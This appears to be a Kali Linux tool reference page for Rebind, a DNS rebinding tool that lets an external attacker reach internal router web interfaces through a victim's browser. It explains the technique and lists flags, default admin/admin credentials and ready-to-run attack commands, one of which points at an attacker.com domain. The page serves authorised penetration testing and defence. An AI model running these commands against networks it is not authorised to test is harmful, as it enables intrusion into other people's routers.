Exploitationdnsrebindingrouterattackdns-rebind

Rebind

Rebind is a DNS rebinding tool that implements multiple A record attacks to bypass network restrictions. It targets routers or public IP addresses by providing external access to internal web interfaces.

Description

Rebind provides an external attacker access to a target router’s internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and bind their Web service to the router’s WAN interface. Remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker.

Although originally written to target home routers, Rebind can be used to target any public (non RFC1918) IP address. It starts DNS server on port 53, attack Web server on port 80, callback Web server on port 81, and proxy server on a specified IP and port.

How It Works

Rebind implements the multiple A record DNS rebinding attack. It responds to DNS queries with different IP addresses in successive responses, initially resolving to the attacker's server and then rebinding to the target's internal IP. This tricks the browser into bypassing same-origin policy, allowing access to internal services like router web interfaces bound to WAN.

Installation

bash

sudo apt install rebind

Flags

-i <interface>Specify the network interface to bind to

-d <fqdn>Specify your registered domain name

-u <user>Specify the Basic Authentication user name [admin]

-a <pass>Specify the Basic Authentication password [admin]

-r <path>Specify the initial URL request path [/]

-t <ip>Specify a comma separated list of target IP addresses [client IP]

-n <time>Specify the callback interval in milliseconds [2000]

-p <port>Specify the target port [80]

Examples

Conduct the rebind attack using interface eth0 with the specified domain kali.local. Starts DNS server on port 53, attack Web server on port 80, callback Web server on port 81, and proxy server.

rebind -i eth0 -d kali.local

Command within rebind interactive mode to show DNS rebinding responses like [+] 192.168.1.202 kali.local.

dns

Display help and usage information for the dns-rebind tool.

dns-rebind -h

Run rebind with custom Basic Authentication credentials on specified interface and domain.

rebind -i eth0 -d kali.local -u admin -a admin

Specify target IP addresses for rebinding attack.

rebind -i eth0 -d example.com -t 192.168.1.1

Use wireless interface and custom target port for the attack.

rebind -i wlan0 -d attacker.com -p 8080

Set initial URL request path to /admin during the attack.

rebind -i eth0 -d kali.local -r /admin

Updated 2026-04-16kali.org ↗